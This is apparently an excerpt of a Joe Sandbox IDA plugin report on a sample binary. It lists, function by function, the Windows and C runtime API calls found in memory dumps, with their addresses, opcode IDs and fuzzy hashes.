                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2260680371-0
                                                                                                                                                                                              • Opcode ID: 213f0d88e8fef07f7c11b0e4cdb1676d49090c83539df82a6a71b5229e2bddb3
                                                                                                                                                                                              • Instruction ID: a902cf846fc8f65dec64cb7ad651c783553dd07dfec231c95189cedf6fbfc672
                                                                                                                                                                                              • Opcode Fuzzy Hash: 213f0d88e8fef07f7c11b0e4cdb1676d49090c83539df82a6a71b5229e2bddb3
                                                                                                                                                                                              • Instruction Fuzzy Hash: E3014CB19003146AEF31AB714C09BFD37889F0B791F044419FA02D2085D75ACA89F6B3
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Info
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1807457897-3916222277
                                                                                                                                                                                              • Opcode ID: 22d01e4015a1dec92a2ace1f3f56dbe923b7d7b6fb9f42f131ae04ec47aed738
                                                                                                                                                                                              • Instruction ID: d4139922c1d7ed6fc55d3702e67c6df8a63217a5b60880c1465857835a08e967
                                                                                                                                                                                              • Opcode Fuzzy Hash: 22d01e4015a1dec92a2ace1f3f56dbe923b7d7b6fb9f42f131ae04ec47aed738
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7141467590428D9ADF218E248D86FE6BBAAEB45304F1404ECE6DA86142D334AA45AF60
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00FCAFDD
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String
                                                                                                                                                                                              • String ID: LCMapStringEx
                                                                                                                                                                                              • API String ID: 2568140703-3893581201
                                                                                                                                                                                              • Opcode ID: 5fbca3b3f29d3edf2be3471ff4f5b6b7c20c0eeb56f8c3940190c1a15795eb55
                                                                                                                                                                                              • Instruction ID: 652835e0e476f877afdc59f6d591a74669b359713edf3cc1c46158e2ae228178
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5fbca3b3f29d3edf2be3471ff4f5b6b7c20c0eeb56f8c3940190c1a15795eb55
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A01173250520EBBCF02AFA0DD06EEE7F62EB48754F05415AFE1426260C676D931FB82
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00FCA56F), ref: 00FCAF55
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                                                                                                                              • API String ID: 2593887523-3084827643
                                                                                                                                                                                              • Opcode ID: 7352db4300ae4bf74a2c14d25487376dc8e84ff1d7e5ef2b09012e4b52f2bd84
                                                                                                                                                                                              • Instruction ID: e01588ce838a0abaab9141db870723dfa49acca8390b9e0b80cd1f6e8c4ce4be
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7352db4300ae4bf74a2c14d25487376dc8e84ff1d7e5ef2b09012e4b52f2bd84
                                                                                                                                                                                              • Instruction Fuzzy Hash: D5F0B432A4621DBBCB026F60CC16D9D7F62EF04711B40416AFD085A260EA319A10FB87
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Alloc
                                                                                                                                                                                              • String ID: FlsAlloc
                                                                                                                                                                                              • API String ID: 2773662609-671089009
                                                                                                                                                                                              • Opcode ID: e2a7d0a369c1e31de1b52b3158bd3370fa5f5d3b13ecd8fd2b0e90a3138282b3
                                                                                                                                                                                              • Instruction ID: 3f5e1bef92dd3e96cb37aeb6c5fb334c2e74509ad94f45d80424a21e72843b09
                                                                                                                                                                                              • Opcode Fuzzy Hash: e2a7d0a369c1e31de1b52b3158bd3370fa5f5d3b13ecd8fd2b0e90a3138282b3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AE05532A8231E7BC300BB76CC13E6EBB52DB04722B40019AF8059B340DD30AE00B6CB
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00FBEAF9
                                                                                                                                                                                                • Part of subcall function 00FBE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FBE8D0
                                                                                                                                                                                                • Part of subcall function 00FBE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FBE8E1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                              • String ID: 3Ro
                                                                                                                                                                                              • API String ID: 1269201914-1492261280
                                                                                                                                                                                              • Opcode ID: 6babbe7c3582b000bdf2ad34aa7680896850fbc8a6f0c60f1f0d58ea5bdebfdd
                                                                                                                                                                                              • Instruction ID: 382b9aab1179d0140cfb3ec6b384ef699ac54f20b6235689fac4342063c94317
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6babbe7c3582b000bdf2ad34aa7680896850fbc8a6f0c60f1f0d58ea5bdebfdd
                                                                                                                                                                                              • Instruction Fuzzy Hash: 27B012C729B4437C3405A2035E02CFB050EE4C0B90330801FF504C80C1DC84CC013CB2
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00FCB7BB: GetOEMCP.KERNEL32(00000000), ref: 00FCB7E6
                                                                                                                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00FCBA89,?,00000000), ref: 00FCBC64
                                                                                                                                                                                              • GetCPInfo.KERNEL32(00000000,00FCBA89,?,?,?,00FCBA89,?,00000000), ref: 00FCBC77
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CodeInfoPageValid
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 546120528-0
                                                                                                                                                                                              • Opcode ID: 85801d7e782b82d44534b78fb312fb7356407cee3f416192737fa75987a7d2a6
                                                                                                                                                                                              • Instruction ID: fe28e11bae46865d1da9c9a3622e7b1df2e8af611067cd454301a831df9d7bd7
                                                                                                                                                                                              • Opcode Fuzzy Hash: 85801d7e782b82d44534b78fb312fb7356407cee3f416192737fa75987a7d2a6
                                                                                                                                                                                              • Instruction Fuzzy Hash: AC515778E002079EDB20DF75CA83FBABBE5EF41320F14406ED4968B251D7399946EB91
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00FA9A50,?,?,00000000,?,?,00FA8CBC,?), ref: 00FA9BAB
                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00FA8411,-00009570,00000000,000007F3), ref: 00FA9BB6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                              • Opcode ID: c0d0395103af6e830c750579d63b96d932c69fe9d2cd6c37fd06df230f04a61c
                                                                                                                                                                                              • Instruction ID: 0a182884b0b3b3d117a754e11b3c9e2448a92d705812e7897b437ae7736ad9af
                                                                                                                                                                                              • Opcode Fuzzy Hash: c0d0395103af6e830c750579d63b96d932c69fe9d2cd6c37fd06df230f04a61c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C4104B59083018FDB24CF24D54456AB7E5FFD6360F14893EE89283260D7F4EE04AA61
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00FC97E5: GetLastError.KERNEL32(?,00FE1030,00FC4674,00FE1030,?,?,00FC3F73,00000050,?,00FE1030,00000200), ref: 00FC97E9
                                                                                                                                                                                                • Part of subcall function 00FC97E5: _free.LIBCMT ref: 00FC981C
                                                                                                                                                                                                • Part of subcall function 00FC97E5: SetLastError.KERNEL32(00000000,?,00FE1030,00000200), ref: 00FC985D
                                                                                                                                                                                                • Part of subcall function 00FC97E5: _abort.LIBCMT ref: 00FC9863
                                                                                                                                                                                                • Part of subcall function 00FCBB4E: _abort.LIBCMT ref: 00FCBB80
                                                                                                                                                                                                • Part of subcall function 00FCBB4E: _free.LIBCMT ref: 00FCBBB4
                                                                                                                                                                                                • Part of subcall function 00FCB7BB: GetOEMCP.KERNEL32(00000000), ref: 00FCB7E6
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCBA9F
                                                                                                                                                                                              • _free.LIBCMT ref: 00FCBAD5
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: _free$ErrorLast_abort
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2991157371-0
                                                                                                                                                                                              • Opcode ID: 1324d4322fef89ae7ceefa914901041d763643dd23a4ea46a6b36dfa7280803e
                                                                                                                                                                                              • Instruction ID: dfa8b0a86842b0adad95cb16c152bb58adfdf4c2e8133da48fdb097ce091d2db
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1324d4322fef89ae7ceefa914901041d763643dd23a4ea46a6b36dfa7280803e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8331A435D0410BAFDB10EBA8DA43F9977E5EF40320F25409EE8449B2A2EB7A5D41FB50
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 00FA1E55
                                                                                                                                                                                                • Part of subcall function 00FA3BBA: __EH_prolog.LIBCMT ref: 00FA3BBF
                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FA1EFD
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: H_prolog$_wcslen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2838827086-0
                                                                                                                                                                                              • Opcode ID: f6cdd30ba41e3c53b9319bb0298e15f4a4d17e6b944398857a25b12267ecf5c6
                                                                                                                                                                                              • Instruction ID: 0681706a2dbc92f3ff57fc922f26092bf5011e90587854856f77756750f6ffca
                                                                                                                                                                                              • Opcode Fuzzy Hash: f6cdd30ba41e3c53b9319bb0298e15f4a4d17e6b944398857a25b12267ecf5c6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 37316AB1904209AFCF11DF99C955AEEBBF6BF49310F114069E845A7251C73A5E00EF60
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00FA73BC,?,?,?,00000000), ref: 00FA9DBC
                                                                                                                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00FA9E70
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$BuffersFlushTime
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1392018926-0
                                                                                                                                                                                              • Opcode ID: 4d3e16cac276ca61e38f916e3d293cf155c012054a93f9645301922028933752
                                                                                                                                                                                              • Instruction ID: 0688b2ebd5bf6bdb7de4eca08761c187b3f218bc00b106630ac9a697031da6ea
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d3e16cac276ca61e38f916e3d293cf155c012054a93f9645301922028933752
                                                                                                                                                                                              • Instruction Fuzzy Hash: A821017164C245AFC714CF35C891AABBBE8AF52314F08492DF4C5C3141D369E94DEB62
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00FA9F27,?,?,00FA771A), ref: 00FA96E6
                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00FA9F27,?,?,00FA771A), ref: 00FA9716
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                              • Opcode ID: 3b91b3aa7a9d17ff155ca67e1de4ba5bfd898b954b819db5494ea6a3635fea6f
                                                                                                                                                                                              • Instruction ID: 13685ba82a6b1262b851ded9b1c59eaf06d49c29995d764a06069485f9e863c8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b91b3aa7a9d17ff155ca67e1de4ba5bfd898b954b819db5494ea6a3635fea6f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5621C4B15047446FE3308A65CC89BE777DCEF4A334F100A29FA95C62D1C7B8A844A671
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00FA9EC7
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00FA9ED4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                              • Opcode ID: 5cf2fa814fce5b3841151b99154ed0cffea919ef747af704efd097bedf9d2afd
                                                                                                                                                                                              • Instruction ID: c81cd42e06dcbcfdaeea6181700fa90c93cb31a8afad7c2d0baf76aa56ef7478
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5cf2fa814fce5b3841151b99154ed0cffea919ef747af704efd097bedf9d2afd
                                                                                                                                                                                              • Instruction Fuzzy Hash: ED1125B1A04300ABD724C739CC84BA6B3E9AB46370F504A39E552D26E1D3F0ED45E770
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _free.LIBCMT ref: 00FC8E75
                                                                                                                                                                                                • Part of subcall function 00FC8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00FCCA2C,00000000,?,00FC6CBE,?,00000008,?,00FC91E0,?,?,?), ref: 00FC8E38
                                                                                                                                                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00FE1098,00FA17CE,?,?,00000007,?,?,?,00FA13D6,?,00000000), ref: 00FC8EB1
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.1649866553.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000000.00000002.1649816533.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649903670.0000000000FD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000000FE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1649979140.0000000001002000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000000.00000002.1650032461.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_fa0000_YGk3y6Tdix.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Heap$AllocAllocate_free
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2447670028-0
                                                                                                                                                                                              • Opcode ID: c5640e7a16d178a2231e7b6d254742fb1892b730ebd6add2798f3adbee21027e
                                                                                                                                                                                              • Instruction ID: 048ddcc7c43bdc6dc53af340c771bcd0f0096468994655aefedf665ac3a4d2ff
                                                                                                                                                                                              • Opcode Fuzzy Hash: c5640e7a16d178a2231e7b6d254742fb1892b730ebd6add2798f3adbee21027e
